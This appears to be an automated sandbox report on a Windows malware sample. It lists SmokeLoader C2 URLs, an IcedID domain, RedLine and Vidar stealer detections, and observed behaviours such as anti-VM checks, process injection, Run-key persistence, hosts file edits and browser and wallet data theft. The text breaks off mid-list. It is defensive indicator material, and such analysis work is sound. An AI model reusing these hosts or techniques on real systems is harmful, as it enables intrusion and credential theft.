Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
740s -
max time network
1832s -
platform
windows11_x64 -
resource
win11 -
submitted
22-10-2021 14:38
Static task
static1
Behavioral task
behavioral1
Sample
Fri051e1e7444.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
Fri051e1e7444.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
Fri051e1e7444.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
Fri051e1e7444.exe
Resource
win11
Behavioral task
behavioral5
Sample
Fri051e1e7444.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
Fri051e1e7444.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
Fri051e1e7444.exe
Resource
win10-de-20210920
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Malware Config
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
Extracted
icedid
1875681804
enticationmetho.ink
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4676 4184 rundll32.exe 168 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6708 4184 rundll32.exe 168 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5692 4184 rundll32.exe 168 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/3360-352-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/3324-353-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule behavioral4/files/0x000300000001e5f7-175.dat family_socelars behavioral4/files/0x000300000001e5f7-198.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 16 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exedescription pid Process procid_target PID 2960 created 2444 2960 WerFault.exe 105 PID 768 created 4388 768 WerFault.exe 91 PID 3036 created 2696 3036 WerFault.exe 114 PID 2180 created 1416 2180 powershell.exe 96 PID 5836 created 3480 5836 WerFault.exe 147 PID 5916 created 3696 5916 WerFault.exe 146 PID 3532 created 5412 3532 WerFault.exe 143 PID 2104 created 768 2104 WerFault.exe 191 PID 2344 created 3440 2344 WerFault.exe 204 PID 5036 created 3728 5036 WerFault.exe 215 PID 2056 created 5096 2056 WerFault.exe 266 PID 6356 created 908 6356 WerFault.exe 288 PID 6664 created 6420 6664 msedge.exe 326 PID 6984 created 6752 6984 WerFault.exe 304 PID 6512 created 6820 6512 WerFault.exe 323 PID 4052 created 6420 4052 WerFault.exe 326 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
Processes:
resource yara_rule behavioral4/memory/1544-191-0x0000000000EC0000-0x0000000000F96000-memory.dmp family_vidar behavioral4/memory/2444-219-0x0000000000EF0000-0x0000000000FC6000-memory.dmp family_vidar behavioral4/memory/1048-320-0x000000001C720000-0x000000001C7F8000-memory.dmp family_vidar -
Blocklisted process makes network request 40 IoCs
Processes:
MsiExec.exeflow pid Process 544 4152 MsiExec.exe 545 4152 MsiExec.exe 546 4152 MsiExec.exe 548 4152 MsiExec.exe 550 4152 MsiExec.exe 551 4152 MsiExec.exe 552 4152 MsiExec.exe 557 4152 MsiExec.exe 558 4152 MsiExec.exe 562 4152 MsiExec.exe 564 4152 MsiExec.exe 565 4152 MsiExec.exe 566 4152 MsiExec.exe 567 4152 MsiExec.exe 568 4152 MsiExec.exe 570 4152 MsiExec.exe 571 4152 MsiExec.exe 572 4152 MsiExec.exe 574 4152 MsiExec.exe 575 4152 MsiExec.exe 576 4152 MsiExec.exe 577 4152 MsiExec.exe 578 4152 MsiExec.exe 580 4152 MsiExec.exe 581 4152 MsiExec.exe 583 4152 MsiExec.exe 585 4152 MsiExec.exe 586 4152 MsiExec.exe 587 4152 MsiExec.exe 588 4152 MsiExec.exe 590 4152 MsiExec.exe 592 4152 MsiExec.exe 593 4152 MsiExec.exe 594 4152 MsiExec.exe 595 4152 MsiExec.exe 596 4152 MsiExec.exe 597 4152 MsiExec.exe 598 4152 MsiExec.exe 599 4152 MsiExec.exe 602 4152 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
DYbALA.exeDYbALA.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
Processes:
CoEA_w0kyWG2WXlI_NmzGIeB.exe6U5d9bdqsMb6CVYEgAtCoc7k.exewtMzR3Vvnv_QiztxLZ_MVD3l.exeQLESn8qIBxPtJtPRbSsyAENo.exeL69DfgFoAllVllEy2jOxVIeu.exe7M7Hn4tZ95KaqTur0so4Bmsu.exegG966mdTjMQCGobSA1xfEzb7.exe7qn4oO9BoLqPcXPnJsizWxHM.exeW4ysop1FHYRr_xdZXf7ZCJ_e.exeg8fcyuzFoqvSg8OUP0tHcBoy.exeyEIsgJfYOoWfBJEJNEoLkIc8.exeGrGMu1jtRUEKfTZWJK40WE4K.exe71hdwuYNuZsjLfxrzhnRb4Ls.exeN0NCDPohiNjHdlr2B2UqrBcW.exeDKAkDeyF1LExOxO6TrKZ5_B7.exe27nNpMIlNTg7B__qK3RO47JE.exeE8b5UKJ6STYQ0e00s7p6lTHo.exeztFLqZo8tsSQFc1wqHeNc22m.exetGPLfmakviwwx8D8QKxJELZ_.exeLLM8p_bDrZ_4l1sMHXmCXrq8.exewqbiRgzzrWfkfpbw9ubodg0k.exegQG7ehujuMNa34AUJoZTHfYH.exen4B2euMVLh0bciK4wmLM5Ln_.exekxf1nN_BO3OQXSHBdwGCWokI.exetGPLfmakviwwx8D8QKxJELZ_.exegQG7ehujuMNa34AUJoZTHfYH.tmpGrGMu1jtRUEKfTZWJK40WE4K.exeDYbALA.exewfTqKDpMOg0gUSDI4WZ8cFpx.executm3.exeDownFlSetup999.exeinst3.exebuild.exewqbiRgzzrWfkfpbw9ubodg0k.exewtMzR3Vvnv_QiztxLZ_MVD3l.exemx4lGdzRmaOHuNV50QSkuYOw.exe4151360.exe0avwqQL9G3rPBLd3vS74Ps8l.exeDQSpoAhLIdEaLNFmPL1y_5AQ.exelyDzuY17TkHEDB9thlwY6UXK.exeYsPBMke_f_nLTfrT7402u0TT.exeecofo8a9dM9rKhtzF6DUe5WS.exefnK4zd6skiJ7xVbd0NQxDWHw.exeOn307XjhofH5hpn3XhRr0UJT.exesetup.exe6948140.exe8pWB.eXEOn307XjhofH5hpn3XhRr0UJT.tmpa1sIMMdcjuk0TWWU00B_mdKO.exeD93A.exekPBhgOaGQk.exeD93A.exe7968681.exeDYbALA.exe2794099.exesetup.exe1E33.exe294455.exe8882655.exe345C.exesvchost.exe3CD9.exeWinHoster.exeAF99.exepid Process 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 4424 6U5d9bdqsMb6CVYEgAtCoc7k.exe 2196 wtMzR3Vvnv_QiztxLZ_MVD3l.exe 1500 QLESn8qIBxPtJtPRbSsyAENo.exe 1048 L69DfgFoAllVllEy2jOxVIeu.exe 1544 7M7Hn4tZ95KaqTur0so4Bmsu.exe 2112 gG966mdTjMQCGobSA1xfEzb7.exe 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe 4940 W4ysop1FHYRr_xdZXf7ZCJ_e.exe 2800 g8fcyuzFoqvSg8OUP0tHcBoy.exe 4388 yEIsgJfYOoWfBJEJNEoLkIc8.exe 4788 GrGMu1jtRUEKfTZWJK40WE4K.exe 1668 71hdwuYNuZsjLfxrzhnRb4Ls.exe 5040 N0NCDPohiNjHdlr2B2UqrBcW.exe 5100 DKAkDeyF1LExOxO6TrKZ5_B7.exe 4384 27nNpMIlNTg7B__qK3RO47JE.exe 448 E8b5UKJ6STYQ0e00s7p6lTHo.exe 2444 ztFLqZo8tsSQFc1wqHeNc22m.exe 1548 tGPLfmakviwwx8D8QKxJELZ_.exe 4800 LLM8p_bDrZ_4l1sMHXmCXrq8.exe 2608 wqbiRgzzrWfkfpbw9ubodg0k.exe 3352 gQG7ehujuMNa34AUJoZTHfYH.exe 4804 n4B2euMVLh0bciK4wmLM5Ln_.exe 5024 kxf1nN_BO3OQXSHBdwGCWokI.exe 3844 tGPLfmakviwwx8D8QKxJELZ_.exe 816 gQG7ehujuMNa34AUJoZTHfYH.tmp 2696 GrGMu1jtRUEKfTZWJK40WE4K.exe 4424 DYbALA.exe 3804 wfTqKDpMOg0gUSDI4WZ8cFpx.exe 5236 cutm3.exe 5272 DownFlSetup999.exe 5372 inst3.exe 5456 build.exe 3360 wqbiRgzzrWfkfpbw9ubodg0k.exe 3324 wtMzR3Vvnv_QiztxLZ_MVD3l.exe 3040 mx4lGdzRmaOHuNV50QSkuYOw.exe 2600 4151360.exe 4036 0avwqQL9G3rPBLd3vS74Ps8l.exe 3696 DQSpoAhLIdEaLNFmPL1y_5AQ.exe 3432 lyDzuY17TkHEDB9thlwY6UXK.exe 3480 YsPBMke_f_nLTfrT7402u0TT.exe 480 ecofo8a9dM9rKhtzF6DUe5WS.exe 5412 fnK4zd6skiJ7xVbd0NQxDWHw.exe 6040 On307XjhofH5hpn3XhRr0UJT.exe 6076 setup.exe 6136 6948140.exe 5336 8pWB.eXE 4788 On307XjhofH5hpn3XhRr0UJT.tmp 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 3020 D93A.exe 4812 kPBhgOaGQk.exe 1872 D93A.exe 5156 7968681.exe 5916 DYbALA.exe 6120 2794099.exe 6084 setup.exe 4332 1E33.exe 984 294455.exe 3296 8882655.exe 3440 345C.exe 1764 svchost.exe 2852 3CD9.exe 4804 WinHoster.exe 3728 AF99.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
DKAkDeyF1LExOxO6TrKZ5_B7.exeg8fcyuzFoqvSg8OUP0tHcBoy.exeE8b5UKJ6STYQ0e00s7p6lTHo.exeCDF1.exe7968681.exe1E33.exesvchost.exe27nNpMIlNTg7B__qK3RO47JE.exe2794099.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion DKAkDeyF1LExOxO6TrKZ5_B7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion g8fcyuzFoqvSg8OUP0tHcBoy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion E8b5UKJ6STYQ0e00s7p6lTHo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion E8b5UKJ6STYQ0e00s7p6lTHo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CDF1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion g8fcyuzFoqvSg8OUP0tHcBoy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7968681.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1E33.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CDF1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 27nNpMIlNTg7B__qK3RO47JE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion DKAkDeyF1LExOxO6TrKZ5_B7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2794099.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 27nNpMIlNTg7B__qK3RO47JE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7968681.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2794099.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1E33.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe -
Loads dropped DLL 64 IoCs
Processes:
kxf1nN_BO3OQXSHBdwGCWokI.exegQG7ehujuMNa34AUJoZTHfYH.tmpOn307XjhofH5hpn3XhRr0UJT.tmpsetup.exea1sIMMdcjuk0TWWU00B_mdKO.exerundll32.exesetup.exemsiexec.exemsiexec.exeinstaller.exeCalculator.exeautosubplayer.exeautosubplayer.exeMsiExec.exeCalculator.exerundll32.exerundll32.exeCalculator.exeCalculator.exeCalculator.exemsedge.exeCalculator.exeCalculator.exepid Process 5024 kxf1nN_BO3OQXSHBdwGCWokI.exe 5024 kxf1nN_BO3OQXSHBdwGCWokI.exe 816 gQG7ehujuMNa34AUJoZTHfYH.tmp 5024 kxf1nN_BO3OQXSHBdwGCWokI.exe 5024 kxf1nN_BO3OQXSHBdwGCWokI.exe 5024 kxf1nN_BO3OQXSHBdwGCWokI.exe 5024 kxf1nN_BO3OQXSHBdwGCWokI.exe 4788 On307XjhofH5hpn3XhRr0UJT.tmp 6076 setup.exe 6076 setup.exe 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 768 rundll32.exe 6084 setup.exe 6084 setup.exe 5580 msiexec.exe 5580 msiexec.exe 5036 msiexec.exe 5036 msiexec.exe 2596 installer.exe 2596 installer.exe 6076 setup.exe 6076 setup.exe 7152 Calculator.exe 7152 Calculator.exe 7152 Calculator.exe 6076 setup.exe 6140 autosubplayer.exe 6352 autosubplayer.exe 2596 6076 setup.exe 5328 MsiExec.exe 5024 5328 MsiExec.exe 6084 setup.exe 6084 setup.exe 2728 Calculator.exe 2728 Calculator.exe 2728 Calculator.exe 6820 rundll32.exe 6084 setup.exe 6420 rundll32.exe 1100 Calculator.exe 6316 Calculator.exe 6084 setup.exe 5312 a1sIMMdcjuk0TWWU00B_mdKO.exe 5148 Calculator.exe 5148 Calculator.exe 5148 Calculator.exe 1164 msedge.exe 1164 msedge.exe 1164 msedge.exe 3976 Calculator.exe 3976 Calculator.exe 3976 Calculator.exe 1280 Calculator.exe 1280 Calculator.exe 1280 Calculator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral4/files/0x00030000000155df-179.dat themida behavioral4/files/0x000300000001e5ef-205.dat themida behavioral4/files/0x000300000001e5f5-203.dat themida behavioral4/memory/5100-250-0x0000000000E90000-0x0000000000E91000-memory.dmp themida behavioral4/memory/4384-252-0x0000000000C10000-0x0000000000C11000-memory.dmp themida behavioral4/memory/2800-249-0x0000000000C00000-0x0000000000C01000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
setup.exesetup.exemsedge.exe294455.exeDYbALA.exeDYbALA.exedescription ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 294455.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Faexydezheko.exe\"" DYbALA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Xexecavoje.exe\"" DYbALA.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
g8fcyuzFoqvSg8OUP0tHcBoy.exe27nNpMIlNTg7B__qK3RO47JE.exeE8b5UKJ6STYQ0e00s7p6lTHo.exe7968681.exeCDF1.exeDKAkDeyF1LExOxO6TrKZ5_B7.exe2794099.exe1E33.exesvchost.exeN0NCDPohiNjHdlr2B2UqrBcW.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA g8fcyuzFoqvSg8OUP0tHcBoy.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 27nNpMIlNTg7B__qK3RO47JE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA E8b5UKJ6STYQ0e00s7p6lTHo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7968681.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CDF1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DKAkDeyF1LExOxO6TrKZ5_B7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2794099.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1E33.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N0NCDPohiNjHdlr2B2UqrBcW.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc Process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\F: File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\R: File opened (read-only) \??\X: File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: File opened (read-only) \??\Q: File opened (read-only) \??\B: File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: File opened (read-only) \??\K: File opened (read-only) \??\V: File opened (read-only) \??\Y: File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: File opened (read-only) \??\L: File opened (read-only) \??\N: File opened (read-only) \??\O: File opened (read-only) \??\H: File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: File opened (read-only) \??\S: File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 42 ip-api.com 122 ipinfo.io 141 ipinfo.io 289 ipinfo.io 290 ipinfo.io 1 ipinfo.io 33 ipinfo.io 42 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
g8fcyuzFoqvSg8OUP0tHcBoy.exeDKAkDeyF1LExOxO6TrKZ5_B7.exe27nNpMIlNTg7B__qK3RO47JE.exe7968681.exe2794099.exe1E33.exeCDF1.exepid Process 2800 g8fcyuzFoqvSg8OUP0tHcBoy.exe 5100 DKAkDeyF1LExOxO6TrKZ5_B7.exe 4384 27nNpMIlNTg7B__qK3RO47JE.exe 5156 7968681.exe 6120 2794099.exe 4332 1E33.exe 500 CDF1.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
GrGMu1jtRUEKfTZWJK40WE4K.exetGPLfmakviwwx8D8QKxJELZ_.exewqbiRgzzrWfkfpbw9ubodg0k.exewtMzR3Vvnv_QiztxLZ_MVD3l.exeD93A.exeW4ysop1FHYRr_xdZXf7ZCJ_e.exeBD94.exeAF99.execonhost.exedescription pid Process procid_target PID 4788 set thread context of 2696 4788 GrGMu1jtRUEKfTZWJK40WE4K.exe 114 PID 1548 set thread context of 3844 1548 tGPLfmakviwwx8D8QKxJELZ_.exe 115 PID 2608 set thread context of 3360 2608 wqbiRgzzrWfkfpbw9ubodg0k.exe 124 PID 2196 set thread context of 3324 2196 wtMzR3Vvnv_QiztxLZ_MVD3l.exe 129 PID 3020 set thread context of 1872 3020 D93A.exe 174 PID 4940 set thread context of 6096 4940 W4ysop1FHYRr_xdZXf7ZCJ_e.exe 223 PID 4944 set thread context of 1932 4944 BD94.exe 222 PID 3728 set thread context of 1052 3728 AF99.exe 225 PID 4696 set thread context of 6772 4696 conhost.exe 362 -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exe71hdwuYNuZsjLfxrzhnRb4Ls.exedescription ioc Process File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlc.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe 71hdwuYNuZsjLfxrzhnRb4Ls.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll autosubplayer.exe File created C:\Program Files 